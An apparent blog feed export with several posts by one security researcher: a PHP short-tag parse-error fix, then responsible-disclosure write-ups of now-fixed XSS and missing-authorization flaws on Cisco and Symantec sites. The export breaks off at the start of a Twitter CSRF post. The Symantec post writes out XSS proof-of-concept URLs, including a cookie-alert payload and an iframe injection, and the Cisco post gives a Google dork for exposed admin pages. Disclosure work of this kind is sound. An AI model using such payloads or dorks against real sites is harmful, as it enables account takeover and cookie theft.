&lt;span style="font-family: 'Trebuchet MS', sans-serif;"&gt;While working on a test web application, last night, I hit upon the following error, which for a second had me lost.&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-AD1dw7hRdd4/T-Yh1D1lMKI/AAAAAAAAAgg/ggEGU4RlpF0/s1600/PHPParseError.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="280" src="http://2.bp.blogspot.com/-AD1dw7hRdd4/T-Yh1D1lMKI/AAAAAAAAAgg/ggEGU4RlpF0/s550/PHPParseError.png" width="550" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif;"&gt;I checked to see if I had the opening and the closing tags correct. Upon further investigation, I found that this was due to my using the "short tag" for PHP in the html_functions.php file. I normally use "&amp;lt;?php" to open and "?&amp;gt;" to close my PHP statements, but in this particular file, I had left out the "php" and had accidentally used "&amp;lt;?" to open a statement.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif;"&gt;As is evident from the image, I use &lt;a href="http://www.apachefriends.org/en/xampp.html" target="_blank"&gt;XAMPP&lt;/a&gt; to host test applications when developing on Windows. To find out more about this setting, I did some reading on a specific setting in php.ini called "short_open_tag". I opened the php.ini at "c:\xampp\php\php.ini", which is the default location for XAMPP, and searched for the "short_open_tag" setting. This specific setting was set to "off", so the quick fix was merely to change the setting to "on", restart Apache and reload the page. The setting in the php.ini finally looked like this:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;short_open_tag = On&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif;"&gt;The following paragraph explains the setting better, taken from the php.ini file.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
&lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;This directive determines whether or not PHP will recognize code between &amp;lt;? and ?&amp;gt; tags as PHP source which should be processed as such. It's been recommended for several years that you not use the short tag "short cut" and instead to use the full &amp;lt;?php and ?&amp;gt; tag combination. With the wide spread use of XML and use of these tags by other languages, the server can become easily confused and end up parsing the wrong code in the wrong context. But because this short cut has been a feature for such a long time, it's currently still supported for backwards compatibility, but we recommend you don't use them.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;Default Value: On&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;Development Value: Off&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;Production Value: Off&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;http://php.net/short-open-tag&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif;"&gt;Problem solved, I spent the rest of the time I had on some fancy GUI and cookie monsters :D&lt;/span&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/riyazwalikar/~4/XEpxX8hImIc" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/6822303151056332209/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2012/06/php-parse-error-syntax-error-unexpected.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/6822303151056332209?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/6822303151056332209?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/XEpxX8hImIc/php-parse-error-syntax-error-unexpected.html" title="PHP Parse error: syntax error, unexpected $end in &amp;lt;filename&amp;gt; on line &amp;lt;line number&amp;gt; - The Error and The Fix" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-AD1dw7hRdd4/T-Yh1D1lMKI/AAAAAAAAAgg/ggEGU4RlpF0/s72-c/PHPParseError.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2012/06/php-parse-error-syntax-error-unexpected.html</feedburner:origLink></entry><entry 
gd:etag="W/&quot;Ck8MRno6fSp7ImA9WhJTEUo.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-5557769799115360995</id><published>2012-06-19T22:41:00.001-07:00</published><updated>2012-06-19T22:41:27.415-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-06-19T22:41:27.415-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="web application" /><category scheme="http://www.blogger.com/atom/ns#" term="cisco" /><category scheme="http://www.blogger.com/atom/ns#" term="xss" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="cross site scripting" /><title>Multiple Vulnerabilities with the Cisco Developer Network</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;I found a bunch of vulnerabilities with Cisco subdomains a couple of weeks ago; some of them were plain old &lt;/span&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;a href="https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29" target="_blank"&gt;XSS vulnerabilities&lt;/a&gt;,&lt;/span&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt; while others were more interesting. Cisco is yet to fix some of them, which I will not be talking about here; however, I will discuss the other issues that I found and which have now been fixed.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;I found an XSS on the developer.cisco.com domain, and since Cisco uses Single Sign On for most of its subdomains, an attacker could simply exploit this issue and gain access to the user accounts under other Cisco domains. The Cisco Developer Network runs on a well known product, which is actively maintained by the developers and used worldwide by several major corporations.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;For the noobs,&lt;/span&gt; &lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;an XSS or Cross Site Scripting vulnerability occurs when an application accepts user input and sends it back to the browser without removing/encoding malicious characters. Malicious characters are any set of characters that a browser can use to render HTML or script content (&amp;lt;,&amp;gt;,",/&amp;gt; etc.)&lt;/span&gt;.&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt; So, instead of displaying the user input, the browser will render/execute it depending on whether the input was HTML tagged content or script content.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;XSS can cause a lot of serious problems. An attacker can steal cookies, redirect users to fake or malicious sites, control a user's browser using automated frameworks like &lt;a href="http://www.bindshell.net/tools/beef.html" target="_blank"&gt;BeEF&lt;/a&gt; and download and execute exploits on the victim's computer.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;The other issue I found was particularly interesting because the application failed to check necessary user privilege levels while a user attempted access to application modules that were obviously sensitive. To this effect, I was able to locate the administration modules of several key sections under developer.cisco.com that would have allowed me to upload files, change and delete the content that users would see. I had access to all available administrative tasks since the application was clearly not checking whether I had admin or guest privileges. To make things worse, Google had traversed and cached these pages, which would allow an attacker to reach all the administration modules following an advanced Google search.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Now that both the issues have been fixed, here's a finer look at the vulnerabilities:&lt;/span&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;1. XSS in the Cisco Developer Network (developer.cisco.com)&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;The following pages &lt;/span&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;accept client side input via the '_153_keywords' parameter and render it back to the browser without sanitization.&lt;/span&gt;&lt;br /&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;a href="http://developer.cisco.com/group/control_panel/manage?p_p_id=153&amp;amp;p_p_lifecycle=0&amp;amp;p_p_state=maximized&amp;amp;p_p_mode=view"&gt;http://developer.cisco.com/group/control_panel/manage?p_p_id=153&amp;amp;p_p_lifecycle=0&amp;amp;p_p_state=maximized&amp;amp;p_p_mode=view&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;a href="http://developer.cisco.com/group/control_panel/manage?p_p_id=153&amp;amp;p_p_lifecycle=0&amp;amp;p_p_state=maximized&amp;amp;p_p_mode=view&amp;amp;_153_tabs1=completed"&gt;http://developer.cisco.com/group/control_panel/manage?p_p_id=153&amp;amp;p_p_lifecycle=0&amp;amp;p_p_state=maximized&amp;amp;p_p_mode=view&amp;amp;_153_tabs1=completed&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;This was a POST based XSS, &lt;/span&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;hence to craft an attack vector, an attacker would need to create a page that auto-submits a form when the page body loads.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&amp;nbsp;&lt;/span&gt; &lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-kCFYP4J_h34/T-FYNRuXiLI/AAAAAAAAAfI/DwleEiOg9J0/s1600/XSS_myworkflow_tasks_completed.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="350" src="http://4.bp.blogspot.com/-kCFYP4J_h34/T-FYNRuXiLI/AAAAAAAAAfI/DwleEiOg9J0/s640/XSS_myworkflow_tasks_completed.png" width="550" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;/span&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-0O6R9Q3zMmg/T-FX8u7dZEI/AAAAAAAAAfA/96yaDC8WJzg/s1600/XSS_myworkflow_tasks_pending.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="350" src="http://4.bp.blogspot.com/-0O6R9Q3zMmg/T-FX8u7dZEI/AAAAAAAAAfA/96yaDC8WJzg/s640/XSS_myworkflow_tasks_pending.png" width="550" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;/span&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;2. Insufficient privilege/permission check on the Cisco Developer Network.&lt;br /&gt;The application did not verify the permission levels of logged-in users when providing access to the administration modules of several sections listed on &lt;a href="http://developer.cisco.com/web/cdc/tech"&gt;http://developer.cisco.com/web/cdc/tech&lt;/a&gt; under "Available Technology Centers".&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Some examples were:&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;http://developer.cisco.com/web/cupapi/admin&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;http://developer.cisco.com/web/telesched/administration&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-dnPcGBRoET0/T-FaWQ3Ek0I/AAAAAAAAAfQ/4Ms7baDznjY/s1600/inadequete_permissions.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="350" src="http://2.bp.blogspot.com/-dnPcGBRoET0/T-FaWQ3Ek0I/AAAAAAAAAfQ/4Ms7baDznjY/s640/inadequete_permissions.png" width="550" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;An advanced Google search, like the following, can get a list of modules that were vulnerable:&lt;br /&gt;&lt;a href="https://www.google.co.in/search?q=site:developer.cisco.com/web/%20inurl:admin%20%7C%20inurl:administration"&gt;https://www.google.co.in/search?q=site:developer.cisco.com/web/%20inurl:admin%20|%20inurl:administration&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br/&gt;&lt;br/&gt;Waiting for Cisco to fix some other issues on several other domains before I disclose them here&lt;/span&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;. Till then Happy Hacking!&lt;br/&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/riyazwalikar/~4/q8SrfhpK-Qs" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/5557769799115360995/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2012/06/multiple-vulnerabilities-with-cisco.html#comment-form" title="4 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/5557769799115360995?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/5557769799115360995?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/q8SrfhpK-Qs/multiple-vulnerabilities-with-cisco.html" title="Multiple Vulnerabilities with the Cisco Developer Network" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-kCFYP4J_h34/T-FYNRuXiLI/AAAAAAAAAfI/DwleEiOg9J0/s72-c/XSS_myworkflow_tasks_completed.png" height="72" width="72" /><thr:total>4</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2012/06/multiple-vulnerabilities-with-cisco.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkcMRnYycSp7ImA9WhVbFE0.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-5699286579007172755</id><published>2012-05-30T12:53:00.003-07:00</published><updated>2012-05-30T13:01:27.899-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-30T13:01:27.899-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" 
term="symantec" /><category scheme="http://www.blogger.com/atom/ns#" term="esapi" /><category scheme="http://www.blogger.com/atom/ns#" term="injection" /><category scheme="http://www.blogger.com/atom/ns#" term="xss" /><category scheme="http://www.blogger.com/atom/ns#" term="owasp" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="cross site scripting" /><category scheme="http://www.blogger.com/atom/ns#" term="iframe" /><title>XSS vulnerabilities in Symantec websites</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;A couple of weeks ago, while doing some research for a paper I have been working on, I found two &lt;a href="https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29" target="_blank"&gt;XSS vulnerabilities&lt;/a&gt; with the Symantec Learning Management System (symlms.symantec.com) and Enterprise Support Login Page (seer.entsupport.symantec.com).&lt;/span&gt; &lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;An XSS or Cross-Site Scripting vulnerability occurs when an application accepts user input and sends it back to the browser without removing or encoding malicious characters. Malicious characters are any characters that a browser can use to render HTML or script content (&amp;lt;, &amp;gt;, ", /&amp;gt; etc.).&lt;/span&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt; So, instead of displaying the user input, the browser will render or execute it, depending on whether the input was HTML-tagged content or script content.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;XSS can cause a lot of serious problems. An attacker can steal cookies, redirect users to fake or malicious sites, control a user's browser using automated frameworks like &lt;a href="http://www.bindshell.net/tools/beef.html" target="_blank"&gt;BeEF&lt;/a&gt; and download and execute exploits on the victim's computer.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;On average, it is easy to find XSS vulnerabilities on the Internet, but finding an XSS issue on a website that is owned and administered by a security services company is quite something. I reported both vulnerabilities as soon as I discovered them, and the security team at Symantec was quite appreciative and welcoming of my disclosures.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Now that both the issues have been fixed, here's a finer look at the vulnerabilities:&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;1. XSS in the Symantec Learning Management System (symlms.symantec.com)&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;The page at &lt;a href="https://symlms.symantec.com/sumtotal/lang-en/SYS_login.asp"&gt;https://symlms.symantec.com/sumtotal/lang-en/SYS_login.asp&lt;/a&gt; accepts client side input via the 'ru' hidden parameter and renders it back to the browser without sanitization.&lt;br /&gt;&lt;br /&gt;An attack vector could be crafted along the lines of:&lt;/span&gt;&lt;br /&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;https://symlms.symantec.com/sumtotal/lang-en/SYS_login.asp?ru=a%27/%3E%3Ch1%20onmousemove=javascript:alert%28document.cookie%29%3ETEST%3C/h1%3E&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;https://symlms.symantec.com/sumtotal/lang-en/SYS_login.asp?ru=tester%27%3E%3Ciframe%20src=%22http://www.wikipedia.org%22%20width=600%20height=1000%3E%3C/iframe%3E&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&amp;nbsp;&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-RmEDwbOZnOQ/T8Z5m2px31I/AAAAAAAAAes/PDegC1WSL3M/s1600/symlms-xss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="350" src="http://1.bp.blogspot.com/-RmEDwbOZnOQ/T8Z5m2px31I/AAAAAAAAAes/PDegC1WSL3M/s400/symlms-xss.png" width="550" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;2. XSS in the &lt;/span&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Enterprise Support Login Page (seer.entsupport.symantec.com)&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;The page at &lt;a href="http://seer.entsupport.symantec.com/downloads/export.asp"&gt;http://seer.entsupport.symantec.com/downloads/export.asp&lt;/a&gt; accepts client side input via the 'username', 'useremail' and 'userphone' parameters and renders it back to the browser without sanitization.&lt;br /&gt;&lt;br /&gt;An attack vector could be crafted along the lines of:&lt;/span&gt;&lt;br /&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;http://seer.entsupport.symantec.com/downloads/export.asp?username=test%22%3E%3Cscript%3Ealert%280%29%3C/script%3E&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;http://seer.entsupport.symantec.com/downloads/export.asp?useremail=test%22%3E%3Cscript%3Ealert%280%29%3C/script%3E&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;http://seer.entsupport.symantec.com/downloads/export.asp?userphone=test%22%3E%3Cscript%3Ealert%280%29%3C/script%3E&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&amp;nbsp;&lt;/span&gt;&lt;div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-chZGG3-MTrQ/T8Z5owXIrqI/AAAAAAAAAe0/KGuAuRlRFcM/s1600/seer.entsupport.symantec.com-xss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="350" src="http://1.bp.blogspot.com/-chZGG3-MTrQ/T8Z5owXIrqI/AAAAAAAAAe0/KGuAuRlRFcM/s400/seer.entsupport.symantec.com-xss.png" width="550" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Input sanitization and output encoding of user input provide protection against XSS. There are several libraries that make it easier for developers to create web applications without worrying too much about threats like XSS. The &lt;a href="https://www.owasp.org/index.php/ESAPI" target="_blank"&gt;OWASP ESAPI&lt;/a&gt; library is what comes to my mind whenever I find XSS anywhere.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;A couple of more interesting disclosures lined up for June. Till then Happy Hacking!&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/riyazwalikar/~4/W29W-Pbjgvw" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/5699286579007172755/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2012/05/xss-vulnerabilities-in-symantec.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/5699286579007172755?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/5699286579007172755?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/W29W-Pbjgvw/xss-vulnerabilities-in-symantec.html" title="XSS vulnerabilities in Symantec websites" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-RmEDwbOZnOQ/T8Z5m2px31I/AAAAAAAAAes/PDegC1WSL3M/s72-c/symlms-xss.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2012/05/xss-vulnerabilities-in-symantec.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0QBRH47fyp7ImA9WhVUEk8.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-4444493052577548298</id><published>2012-05-16T01:09:00.000-07:00</published><updated>2012-05-16T20:29:15.007-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-05-16T20:29:15.007-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="csrf" /><category 
scheme="http://www.blogger.com/atom/ns#" term="wipe addressbook" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="twitter" /><category scheme="http://www.blogger.com/atom/ns#" term="hall of fame" /><title>Twitter Wipe Addressbook CSRF Vulnerability</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;I disclosed a &lt;a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29" target="_blank"&gt;CSRF vulnerability&lt;/a&gt; with Twitter that could allow a malicious attacker to wipe the address book of an unsuspecting user. I reported the vulnerability in the beginning of March and they fixed it on the 22nd! I wouldn't want to comment on the process and internal business logic that they follow, but honestly that was a pretty long period for them to come up with a fix.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Anyway, getting to the vulnerability: the issue was that a user could delete his own address book with a single-click URL, which is fine as long as the user wishes to do so himself. However, since the server did not verify whether the request was sent intentionally by the user or whether the user was tricked into sending it, the application allowed an attacker to generate a request on behalf of a logged-in user from the user's browser and perform the action (deletion of the address book).&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;The normal process would be as follows:&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;1. A user logs into mobile.twitter.com&lt;/span&gt;&lt;br /&gt;
